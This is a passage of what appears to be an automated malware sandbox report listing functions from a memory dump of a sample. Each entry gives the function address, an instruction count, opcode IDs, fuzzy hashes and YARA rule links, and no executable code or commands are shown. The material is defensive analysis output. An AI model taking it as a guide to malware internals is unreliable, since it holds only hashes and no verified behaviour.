                                                                                                                                            Function 017D60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 06152ebb418d7bb14a53b4a191459e4e0921c98be4ae28c8bf69fc90ccbcede0
                                                                                                                                            • Instruction ID: d90f5be3d0e4a53b47bd82e605597c83c3da69427d125a4cdcc938434cfb812b
                                                                                                                                            • Opcode Fuzzy Hash: 06152ebb418d7bb14a53b4a191459e4e0921c98be4ae28c8bf69fc90ccbcede0
                                                                                                                                            • Instruction Fuzzy Hash: 34917071E0421AAFDF15CFA8D884BAEFBB5AF48710F154169F610EB345D734EA009BA0
                                                                                                                                            Function 0176E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d2cbfdea788d73f93f58a59b441ad36779b7e87895bc53e6786ba144bb592ad
                                                                                                                                            • Instruction ID: 0345d894347dab7c482ad3957ccdcccd421760c8e25f449242795976b6c7b7dd
                                                                                                                                            • Opcode Fuzzy Hash: 8d2cbfdea788d73f93f58a59b441ad36779b7e87895bc53e6786ba144bb592ad
                                                                                                                                            • Instruction Fuzzy Hash: F1914579A00216CBDB24DB28C884BBDFBA9EF94714F2540A5EE159B385FB34D901CB61
                                                                                                                                            Function 017A6ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b0b4dcad6d0d7282c1351a0ed5ddd9ba1fe5709c2fa46156f6747f23f1afac83
                                                                                                                                            • Instruction ID: d03d87e2287b8e48ece279281e4082aab7c4fa44631032b684f1dfe04b0e734e
                                                                                                                                            • Opcode Fuzzy Hash: b0b4dcad6d0d7282c1351a0ed5ddd9ba1fe5709c2fa46156f6747f23f1afac83
                                                                                                                                            • Instruction Fuzzy Hash: 67819271A006169BDB24CF69D940ABEFBF9FB88700F18852EF556D7640E334E941CBA4
                                                                                                                                            Function 0181AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                            • Instruction ID: 94d7db7e5c27703ed75229360104d36e219fe534a426b47ef743604472d4b454
                                                                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                            • Instruction Fuzzy Hash: 24819272A016499FDF1DCF98C480AAEBBBAFF84314F148569D916DB349D734DA41CB40
                                                                                                                                            Function 0178E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: afa8c0f071b2ecaa485b16c1a7d1fc8543ab6e92bcc426cce6027d6841d503a6
                                                                                                                                            • Instruction ID: c7e2dfd672f78592f1d935b295457167c5d7907edcec36312e55a3abfb8d0df2
                                                                                                                                            • Opcode Fuzzy Hash: afa8c0f071b2ecaa485b16c1a7d1fc8543ab6e92bcc426cce6027d6841d503a6
                                                                                                                                            • Instruction Fuzzy Hash: 6A816D71A4060AAFDB25DFA9C880AEEFBFAFF48354F10442DE555A7250DB30AD45CB60
                                                                                                                                            Function 0176C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2363b7ed9eb8c8e2cefae526611ea8b25eb5b443a774c1bb8430cbea6566a3ff
                                                                                                                                            • Instruction ID: 4a8fbca0f97a5e3b13c225777a13702b62c0c08840aeb733680eb48225ddee35
                                                                                                                                            • Opcode Fuzzy Hash: 2363b7ed9eb8c8e2cefae526611ea8b25eb5b443a774c1bb8430cbea6566a3ff
                                                                                                                                            • Instruction Fuzzy Hash: 4F71CD79C056259BCB268F58C8907FEFBB8FF58710F14416AE982AB350E7749940CBA0
                                                                                                                                            Function 018047A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: a50d92cff381e51a51bec37e12b4b447a4b18c5cb09f12a109f9ca1ec281ee09
                                                                                                                                            • Instruction ID: ccfc185127a242dbd3945d809c48938e9ab0bfacaacbcf11aff830a76cbe5be1
                                                                                                                                            • Opcode Fuzzy Hash: a50d92cff381e51a51bec37e12b4b447a4b18c5cb09f12a109f9ca1ec281ee09
                                                                                                                                            • Instruction Fuzzy Hash: 8C71C174940309EFDB61DF58DD44A9ABBF9EF91310B20416AE700E7299EB328B84CF54
                                                                                                                                            Function 0176260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7f5f90188a7308eb3df5440237296d508383d1b7f98f46b026e15c63b9708bb3
                                                                                                                                            • Instruction ID: fb098e066b780bbc6978b97f59b92f9329eb31ad45c4ea53fcb89c78e2fbb4bf
                                                                                                                                            • Opcode Fuzzy Hash: 7f5f90188a7308eb3df5440237296d508383d1b7f98f46b026e15c63b9708bb3
                                                                                                                                            • Instruction Fuzzy Hash: 5871AD316042428FD352DF28C484B6AF7E9FF84310F0485AAE9998B756DB38DD46CB91
                                                                                                                                            Function 017D035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                            • Instruction ID: 3f5a19e990171a0052a0ac41174a2d227808d7ddef67f015096ff8568f5c3aaa
                                                                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                            • Instruction Fuzzy Hash: 94715E71A0061AAFDB10DFA9C984EEEFBB9FF58700F104569E905A7294DB34EA41CB50
                                                                                                                                            Function 017E62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2ba42732af6d68e93aae03455b85a47fdace7df34abe79de96ad11c458a095aa
                                                                                                                                            • Instruction ID: 0f8dc7bb04f6d5079b9b3e7efd486a3630b1436ce8b65efb33df376cd26aef65
                                                                                                                                            • Opcode Fuzzy Hash: 2ba42732af6d68e93aae03455b85a47fdace7df34abe79de96ad11c458a095aa
                                                                                                                                            • Instruction Fuzzy Hash: 5471F332240701AFEB329F18C84CF5AFBE6EF68760F144428F6558B2A1D775EA44CB50
                                                                                                                                            Function 01758AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7ba52436ec0bf09698210731912568679f6b60b9d04584348bdbedcfd9b39eea
                                                                                                                                            • Instruction ID: 5d950e3d2b2ff89eb026fe4caf653fb01c1c34d849ed95bd2d88797210883b78
                                                                                                                                            • Opcode Fuzzy Hash: 7ba52436ec0bf09698210731912568679f6b60b9d04584348bdbedcfd9b39eea
                                                                                                                                            • Instruction Fuzzy Hash: 8581AE72A093058FDB25CF9DD484BEDF7B5BB48310F16416AD900AB286DB74AE41CF94
                                                                                                                                            Function 0180A250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3b9eb1bef337dc66f1d0f7a71f05cfab575c434097852ca444683e5637689f92
                                                                                                                                            • Instruction ID: c20d22138252a48d38afd2c319647ccd920f275cbef656dec778afee3170376b
                                                                                                                                            • Opcode Fuzzy Hash: 3b9eb1bef337dc66f1d0f7a71f05cfab575c434097852ca444683e5637689f92
                                                                                                                                            • Instruction Fuzzy Hash: D7510472504B1AAFD752DE68CC88E5BB7E8EFC4754F020929BA40DB190D730DE09C7A2
                                                                                                                                            Function 017F8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a0bf09c61b0ebadbb26952c517d544233a116d81dd2e2baaebf7b1e0f0a497a6
                                                                                                                                            • Instruction ID: 672ac6cde330d6bb152c62760a801127e58fdb8141759b59d30dc43de99930ae
                                                                                                                                            • Opcode Fuzzy Hash: a0bf09c61b0ebadbb26952c517d544233a116d81dd2e2baaebf7b1e0f0a497a6
                                                                                                                                            • Instruction Fuzzy Hash: AE51CD70900705EFDB21DF6AC884AABFBF8BF94710F10461ED292977A1D7B0A585CB91
                                                                                                                                            Function 0178E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 221421e3a3f733d171788ba85b23b22ad252954dd45db3599a1c8a6e354a7925
                                                                                                                                            • Instruction ID: 4b18044bf9ae8f5a01b1ed6d1b8f8ce376c4329b134e5ce4d39e66c20eb9d41a
                                                                                                                                            • Opcode Fuzzy Hash: 221421e3a3f733d171788ba85b23b22ad252954dd45db3599a1c8a6e354a7925
                                                                                                                                            • Instruction Fuzzy Hash: FE516971240A05AFCB22EF69C984E6AF3BDFB14744F40086DEA5997665EB34E940CB60
                                                                                                                                            Function 017F4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a94ea9567f8ecc17fc25d6dc8ef306ed5d4121ba099989720cf5dc0b1c90fa52
                                                                                                                                            • Instruction ID: c80d9b6a2d8ca438579f558a3b7cb1b97ece9a72c87b423298a0d21afb265604
                                                                                                                                            • Opcode Fuzzy Hash: a94ea9567f8ecc17fc25d6dc8ef306ed5d4121ba099989720cf5dc0b1c90fa52
                                                                                                                                            • Instruction Fuzzy Hash: 0C5112716083429FD754DF29D880A6BFBE5FFC8218F44492DF69AD7350EA30DA058B52
                                                                                                                                            Function 017745B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                            • Instruction ID: a52498bb94a3ba849c19834f7075fed5ae8851707444fd0b2b910c7f99f0499a
                                                                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                            • Instruction Fuzzy Hash: F5519F71E0021AABDF15DF98C484BEEFBB9AF49754F144069EA02AB240D734DE44CBE0
                                                                                                                                            Function 017DE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                            • Instruction ID: ef4a8188a1796df50cf9c423a2c8c338b17cd3ff046cf1e87d8483505b27fed9
                                                                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                            • Instruction Fuzzy Hash: 4951A531D0060EEFEF229A94CC84FAEFB75AB00364F154665D9126B194DB70AE44CBA1
                                                                                                                                            Function 01818B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aca7f399ff1566dd0309fed7713e1f0763f8c525abe75cd1b387b1b30db4127c
                                                                                                                                            • Instruction ID: 888c19fcaef68482c9960afeb186264f31ad48d50878ddf9fdcc21f292aee645
                                                                                                                                            • Opcode Fuzzy Hash: aca7f399ff1566dd0309fed7713e1f0763f8c525abe75cd1b387b1b30db4127c
                                                                                                                                            • Instruction Fuzzy Hash: A741F3727016019BD729DB2DC896B3BBB9EFF92360F048218E955C7288DB34DA41C691
                                                                                                                                            Function 017DCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b2e367ae0cc71bb2d675e633011f486e188d1ac93d1e6b1e80541f9bd1ca92a8
                                                                                                                                            • Instruction ID: 1e86022f8abfd7524b03bd7b57a28cd87fde2696ebe77fe80686563357417d9e
                                                                                                                                            • Opcode Fuzzy Hash: b2e367ae0cc71bb2d675e633011f486e188d1ac93d1e6b1e80541f9bd1ca92a8
                                                                                                                                            • Instruction Fuzzy Hash: 6551A175900219DFCB21DFA9C9849AEFBB9FF48354B21455DD645A3305EB30AE41CF90
                                                                                                                                            Function 0181A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                            • Instruction ID: 3d6165a112515120737db2dec4f30b049b22114793707ee63b4e51a1909a3a84
                                                                                                                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                            • Instruction Fuzzy Hash: 6141E8736027569FD729CF68C984A6AB7ADFF80314B05462EE952C7249EB30EE14C7D0
                                                                                                                                            Function 017801F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d40cea332be83800b06eb8f0ee2c7044aa89ce7b5bfdebdec6cea8e5005bfa56
                                                                                                                                            • Instruction ID: cc3897b493a7cf636141086d72c05cd4f394f6c4742c9fb9b762b0d5d3e0a914
                                                                                                                                            • Opcode Fuzzy Hash: d40cea332be83800b06eb8f0ee2c7044aa89ce7b5bfdebdec6cea8e5005bfa56
                                                                                                                                            • Instruction Fuzzy Hash: 1241CB36A80219DBDB10EF98C440AEEFBB4BF48710F15826EF815E7241D7359D49CBA4
                                                                                                                                            Function 0177EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cbb5614d603abd75fcf18fbae8a2d0584626eef5c1072e3e1145d0450f86af1c
                                                                                                                                            • Instruction ID: c18e95038acdf34a5e8a3c09a998b6b31a577113397d1d2c6d7406b0869238b0
                                                                                                                                            • Opcode Fuzzy Hash: cbb5614d603abd75fcf18fbae8a2d0584626eef5c1072e3e1145d0450f86af1c
                                                                                                                                            • Instruction Fuzzy Hash: 6541C3752043019FDB25DF28C884A6BF7E9FF88214F1049AAE957C7616EB35E884CB51
                                                                                                                                            Function 01792750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                            • Instruction ID: 77420e2118b65522063151a89a9a29b13aaffa5222bcd5317a8dbc904b35d853
                                                                                                                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                            • Instruction Fuzzy Hash: 59513775A00619CFCB15CF9CC580AAEF7B2FF84B11F2481A9D915A7351E770AE82CB90
                                                                                                                                            Function 01756154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 50585af819920cb05c7a0bdc379bd21a85b1102f2406094279abc69357f51235
                                                                                                                                            • Instruction ID: 87996ea2f507fbc4a82830386dce3820276b09491e18519f523e4233dde2ef09
                                                                                                                                            • Opcode Fuzzy Hash: 50585af819920cb05c7a0bdc379bd21a85b1102f2406094279abc69357f51235
                                                                                                                                            • Instruction Fuzzy Hash: A4510470904206DBEB65DB28CC44BE9FBB1EF15314F1482E5E929972C5EB749981CF40
                                                                                                                                            Function 01750BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a2137a88dd00140037c53225d1bb176461c5ec44f820dfef6fc3c6cb4d1890de
                                                                                                                                            • Instruction ID: 976bcf2b5bf6a22f75c47b0140193296b4b1e512acc7dffb5c0e923b062bfe74
                                                                                                                                            • Opcode Fuzzy Hash: a2137a88dd00140037c53225d1bb176461c5ec44f820dfef6fc3c6cb4d1890de
                                                                                                                                            • Instruction Fuzzy Hash: 4141AF31A002289BDF61DF68C944BEEFBB8AF85740F4101A5E908AB241DB749E84CB91
                                                                                                                                            Function 0181866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                            • Instruction ID: efd86f605dca702e4ac495992a4096d7e0c03fa14488c402fcb943b30a556088
                                                                                                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                            • Instruction Fuzzy Hash: 34419476B00105ABDB15DB99CC86AAFBBBEAF95710F144469E904D7349DA70DE008760
                                                                                                                                            Function 01750887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b360b6f5419ac6bd3e23724bbb8cd6bd0ac76cec1efc317082745eef318d6c74
                                                                                                                                            • Instruction ID: e99fc6d5ce41e5fcd3af4dd4798d4d5786de5aea8711c5089a3dcb7d6f7f5a29
                                                                                                                                            • Opcode Fuzzy Hash: b360b6f5419ac6bd3e23724bbb8cd6bd0ac76cec1efc317082745eef318d6c74
                                                                                                                                            • Instruction Fuzzy Hash: 0E41F3B16007029FE365CF28C484A22FBF8FF89314B144A6DE94787A55EB70F845CB90
                                                                                                                                            Function 0177A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7e4d9a34d8aca87b891b0790875d25fa01ff103cd2d1979df28af1e034ee9d2e
                                                                                                                                            • Instruction ID: 277fc26a1022b1173a8e4608ce7dbc75030251289be97daf341c21bfd5f3d3df
